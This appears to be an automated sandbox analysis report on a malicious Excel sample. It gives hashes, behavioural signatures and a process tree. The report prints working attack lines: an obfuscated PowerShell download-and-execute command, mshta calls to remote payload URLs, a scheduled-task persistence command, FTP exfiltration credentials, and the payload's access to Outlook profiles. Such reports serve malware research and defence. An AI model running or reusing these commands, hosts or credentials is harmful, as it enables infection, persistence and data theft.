Analysis
-
max time kernel
143s -
max time network
132s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
14-09-2022 08:31
Behavioral task
behavioral1
Sample
Microsoft_Excel_97-2003_Worksheet3.xls
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
Microsoft_Excel_97-2003_Worksheet3.xls
Resource
win10v2004-20220812-en
General
-
Target
Microsoft_Excel_97-2003_Worksheet3.xls
-
Size
36KB
-
MD5
4e5efb8250aa5094deb1dc99e5786830
-
SHA1
42124e78ce95be3600258770a002ae01f5e70652
-
SHA256
0fefe416888a41939d0d7143846844edac1b4ee1ea5fd8f98a893ade7a62d34f
-
SHA512
cdba63c4ee4620e85b0af3c08911e237bf0b373187efcad9983d2d6bd9aa5238283ef08ba12e00c04ac4bbb41aa10008ce68a984be70de24d86ee3e6ac2c167d
-
SSDEEP
768:1pz9l7Vbta45G/d9K1EghHsYwiSLSpO7Zp:1pzPzzWdqEghCiKTt
Malware Config
Extracted
https://www.mediafire.com/file/6vip6utwodclo5k/1.htm/file
Extracted
Protocol: ftp- Host:
107.182.129.168 - Port:
21 - Username:
jhfjhjgfh1 - Password:
djfhdjfhdf
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2396 2256 rundll32.exe 80 -
Blocklisted process makes network request 6 IoCs
flow pid Process 42 3320 mshta.exe 44 3320 mshta.exe 46 3320 mshta.exe 50 3320 mshta.exe 54 4708 powershell.exe 56 4708 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts jsc.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation mshta.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe Key opened \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe Key opened \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 4708 set thread context of 408 4708 powershell.exe 106 PID 4708 set thread context of 3972 4708 powershell.exe 107 PID 4708 set thread context of 4236 4708 powershell.exe 108 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp dw20.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1428 schtasks.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe -
Kills process with taskkill 1 IoCs
pid Process 220 taskkill.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 940 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2256 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 21 IoCs
pid Process 4708 powershell.exe 4708 powershell.exe 4708 powershell.exe 4708 powershell.exe 4708 powershell.exe 4708 powershell.exe 4708 powershell.exe 4708 powershell.exe 4708 powershell.exe 4708 powershell.exe 4708 powershell.exe 4708 powershell.exe 4708 powershell.exe 4708 powershell.exe 4708 powershell.exe 4708 powershell.exe 4708 powershell.exe 4708 powershell.exe 408 jsc.exe 408 jsc.exe 408 jsc.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 220 taskkill.exe Token: SeDebugPrivilege 4708 powershell.exe Token: SeRestorePrivilege 4452 dw20.exe Token: SeBackupPrivilege 4452 dw20.exe Token: SeRestorePrivilege 4408 dw20.exe Token: SeBackupPrivilege 4408 dw20.exe Token: SeDebugPrivilege 408 jsc.exe Token: SeBackupPrivilege 4452 dw20.exe Token: SeBackupPrivilege 4408 dw20.exe Token: SeBackupPrivilege 4408 dw20.exe Token: SeBackupPrivilege 4408 dw20.exe Token: SeBackupPrivilege 4452 dw20.exe Token: SeBackupPrivilege 4452 dw20.exe -
Suspicious use of SetWindowsHookEx 15 IoCs
pid Process 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 408 jsc.exe -
Suspicious use of WriteProcessMemory 50 IoCs
description pid Process procid_target PID 2256 wrote to memory of 2396 2256 EXCEL.EXE 94 PID 2256 wrote to memory of 2396 2256 EXCEL.EXE 94 PID 2396 wrote to memory of 3320 2396 rundll32.exe 95 PID 2396 wrote to memory of 3320 2396 rundll32.exe 95 PID 3320 wrote to memory of 220 3320 mshta.exe 99 PID 3320 wrote to memory of 220 3320 mshta.exe 99 PID 3320 wrote to memory of 4708 3320 mshta.exe 101 PID 3320 wrote to memory of 4708 3320 mshta.exe 101 PID 3320 wrote to memory of 1428 3320 mshta.exe 102 PID 3320 wrote to memory of 1428 3320 mshta.exe 102 PID 4708 wrote to memory of 408 4708 powershell.exe 106 PID 4708 wrote to memory of 408 4708 powershell.exe 106 PID 4708 wrote to memory of 408 4708 powershell.exe 106 PID 4708 wrote to memory of 408 4708 powershell.exe 106 PID 4708 wrote to memory of 408 4708 powershell.exe 106 PID 4708 wrote to memory of 408 4708 powershell.exe 106 PID 4708 wrote to memory of 408 4708 powershell.exe 106 PID 4708 wrote to memory of 408 4708 powershell.exe 106 PID 4708 wrote to memory of 3972 4708 powershell.exe 107 PID 4708 wrote to memory of 3972 4708 powershell.exe 107 PID 4708 wrote to memory of 3972 4708 powershell.exe 107 PID 4708 wrote to memory of 3972 4708 powershell.exe 107 PID 4708 wrote to memory of 3972 4708 powershell.exe 107 PID 4708 wrote to memory of 3972 4708 powershell.exe 107 PID 4708 wrote to memory of 3972 4708 powershell.exe 107 PID 4708 wrote to memory of 3972 4708 powershell.exe 107 PID 4708 wrote to memory of 4236 4708 powershell.exe 108 PID 4708 wrote to memory of 4236 4708 powershell.exe 108 PID 4708 wrote to memory of 4236 4708 powershell.exe 108 PID 4708 wrote to memory of 4236 4708 powershell.exe 108 PID 4708 wrote to memory of 4236 4708 powershell.exe 108 PID 4708 wrote to memory of 4236 4708 powershell.exe 108 PID 4708 wrote to memory of 4236 4708 powershell.exe 108 PID 4708 wrote to memory of 4236 4708 powershell.exe 108 PID 3972 wrote to memory of 4408 3972 caspol.exe 110 PID 3972 wrote to memory of 4408 3972 caspol.exe 110 PID 3972 wrote to memory of 4408 3972 caspol.exe 110 PID 4236 wrote to memory of 4452 4236 Msbuild.exe 109 PID 4236 wrote to memory of 4452 4236 Msbuild.exe 109 PID 4236 wrote to memory of 4452 4236 Msbuild.exe 109 PID 4708 wrote to memory of 4776 4708 powershell.exe 114 PID 4708 wrote to memory of 4776 4708 powershell.exe 114 PID 4776 wrote to memory of 4604 4776 csc.exe 115 PID 4776 wrote to memory of 4604 4776 csc.exe 115 PID 4708 wrote to memory of 4464 4708 powershell.exe 116 PID 4708 wrote to memory of 4464 4708 powershell.exe 116 PID 4464 wrote to memory of 4288 4464 csc.exe 117 PID 4464 wrote to memory of 4288 4464 csc.exe 117 PID 4708 wrote to memory of 940 4708 powershell.exe 118 PID 4708 wrote to memory of 940 4708 powershell.exe 118 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Microsoft_Excel_97-2003_Worksheet3.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\SYSTEM32\rundll32.exerundll32 SHELL32.DLL,ShellExec_RunDLL "mshta" "https://www.mediafire.com/file/6vip6utwodclo5k/1.htm/file"2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" "https://www.mediafire.com/file/6vip6utwodclo5k/1.htm/file"3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3320 -
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im WinWord.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (I'r'M('https://www.mediafire.com/file/js9o7zmm8jxypb0/1.txt/file') -useB) | .('{欠}{吗}'.replace('吗','0').replace('欠','1')-f'你','疯').replace('疯','I').replace('你','EX') | ping 127.你疯了.你疯了.14⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"5⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:408
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:3972 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7766⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4408
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:4236 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7566⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4452
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w1w2ox34\w1w2ox34.cmdline"5⤵
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES700.tmp" "c:\Users\Admin\AppData\Local\Temp\w1w2ox34\CSCA78577D31D6949C59D8733FD13CC86EA.TMP"6⤵PID:4604
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s4ekyw1g\s4ekyw1g.cmdline"5⤵
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES241D.tmp" "c:\Users\Admin\AppData\Local\Temp\s4ekyw1g\CSCD220EE8F176D47A7BABD7B5E7AF78E.TMP"6⤵PID:4288
-
-
-
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.你疯了.你疯了.15⤵
- Runs ping.exe
PID:940
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 73 /tn micsrssowfwWorsald /F /tr """Mshta""""""http://www.webclientservices.co.uk/p/1.html"""4⤵
- Creates scheduled task(s)
PID:1428
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD5fcb8d8d6d4704f183855e4ce9f7c6a18
SHA17369d2d6f85f38760791628cdc2003125ebf7ba7
SHA2566b211e8abf752cc65fdea511bb70ff97dd4eb165862a6bc4f374a78b2c8937f3
SHA5126d8276cd85f4bc7d1f305b49b1dcec3cd7f528b42b1a7aa6182ce2bc2e632279e5640511e2392fad059ea1a20fe67911224b068ea050d4804ee548ba5eb3c8a5
-
Filesize
1KB
MD577bdbe7dc2f84a9caf1ca7c2398fbbeb
SHA1c1214f5f598789406e2408ad0b6f7324028a7f04
SHA2569e29e14b4ebaf2afa78d015b404205b7bcfe9a1bd829bace3233af7d803cbe2a
SHA5122c9fa615d7258aac2321d078d4c45da8ba48b494e4d9ed7f1ab863a7a0a72c794bbdeb449139ba2bc4ea55ae8118caf280f2dd1a20fff6d855aa0e3b8626b547
-
Filesize
1KB
MD5623fdc6420e796b37aa50ef8025429bd
SHA12d846451d879d0e4df2309a50f79c5f80e256c1e
SHA256314d243a84978e71753a686cde10607941c47a6eac91b91fea2461b7fade51a7
SHA5126a2ce084da01ce8d4a7684dc382f8d7a482df8c131444103930e70f49a1afc27a242bf6d9172aee135eb97f3bff283093ac5751a8750e8d0163e647096e9f52d
-
Filesize
3KB
MD5ae024aec023564cb1b8fe9325600ea55
SHA16318aa999d81a2dfbcc09bb0b41a188c1d588fb1
SHA2562ee0bb5565ba8cb8d081b27d98f3254898b9c7a2cbf4b4804feafecb2a14f48a
SHA5124681ee2273b53af707484ae899d0229fe9d26248dc5b6a73daf5ae9d54cae03c8b71042c7ede38131458982a77ae49666e6c9576e85e6a0fd191c239d2d3ca3a
-
Filesize
3KB
MD5a489e66311e1e9d4094f5aed3d7bfa95
SHA193fd215e7900be82f90fd53247a0317a4b15e6d4
SHA2565d825b299ee1830ad82bc23b0cabfc70c5c5fbe1f643091c5871b6aa5af6650c
SHA512a201bb135f1aa9ea3db6a9edc3dfd0f1b65a176e049088766cc1354fcba94a43fabb31daa9d06065807adaf09890e99ff1157b046ed7268ebcde919f9fdc5c1f
-
Filesize
652B
MD5834dc921fe86ce9ede4ec7ab0fc356ce
SHA14beb389ce2a4e0d8e45fe261665fdbb21ae807f0
SHA2562aa51062867a8d7e820a014a36a37535565760d943d4aecf0726687c8dd394fd
SHA5126d6b269a65a331408c93af78285ee929c5111452e5c089acaa851cfe229333a250db0cb45903b3108dfa4ebc9fcc0f65c6391edacc62e357c3c50d6f453b6898
-
Filesize
424B
MD55b0a710c68952a280e3737f249a789bb
SHA1cfd4349b3ebe8232b342fa6667e63d8027fcd26b
SHA25632781e50bffd54bf50e075fc3c5fea9bf02030c8aeb34344cf15592d702973ad
SHA51237efadb9ecade74d0f57bf0c5f5ff254203f952a7b54443433dadbc1e720d294ac6e3694a016520b99747a9856dc523d8a901f209285dba53863dd2e3e64e8ad
-
Filesize
369B
MD514e5972c4050a59e4395a471aedbae87
SHA1748c01f74cad53f9701f0c3c802f3888a1b039dd
SHA2563be1a8b65718de504ed371045c65915a8f709f61e044ad9662983aa79723360d
SHA512ef8bb309741f855a9dd9a3a854912cc0bc284c584e45c80888303b789c2dc46b701bd9b5945898e5e975e00a4402c06b6671ac8bc31c12375094f4ea8d8f788b
-
Filesize
652B
MD50f0ff7053ceae7157622c139f6a15a13
SHA19c6a7ca922012127a3bebd0af74a28ba93b151ab
SHA25612de55832cca1b33975bccfe2d4182d8d543a0ecb3e99f086e15037df8a5618f
SHA512f8a9b723c213d241ca74cf734e17d9edc9091c8263bfa01fe6d9d6308ace1345c75b766bc2998ca3d9a2523a70be0a6c2f455c8cf93b425f78173abb85efb4fe
-
Filesize
424B
MD5d05db7ca65c16470a87f4c4007e9e026
SHA1ab4a5e6b4fbc331c345d88c39239f003f8dd3da7
SHA256c1412a0d2269b59df9d6b003b2f82f9479040dae4c4e12629db5845a6ac4c960
SHA512825d664f3df2ad4ef8b1e501e6a99aaae7d54db59b9308c34ad3d64b07a6792412beded53919ea8bf9e137f4a7e8aa7ac388a036ab256a1cce201a208ef311cb
-
Filesize
369B
MD50e56854db396d3b40b7d7d89130d579b
SHA1ca141e65ba2813fc1e62d9f08cb34148ade253da
SHA256ba0b2ecc60473bddbc5e8da50813127d7c6dda2c507ddedee0c1e2a659e9200c
SHA5126b91f5f2654174ad4a4e53a1a26e1c8b5313bdc8d487f1de0dc091434f1c36dcf3ee6c7ab691f8b7c9d1530fb19f68074950d05229025978a4d3c1de5688d1f1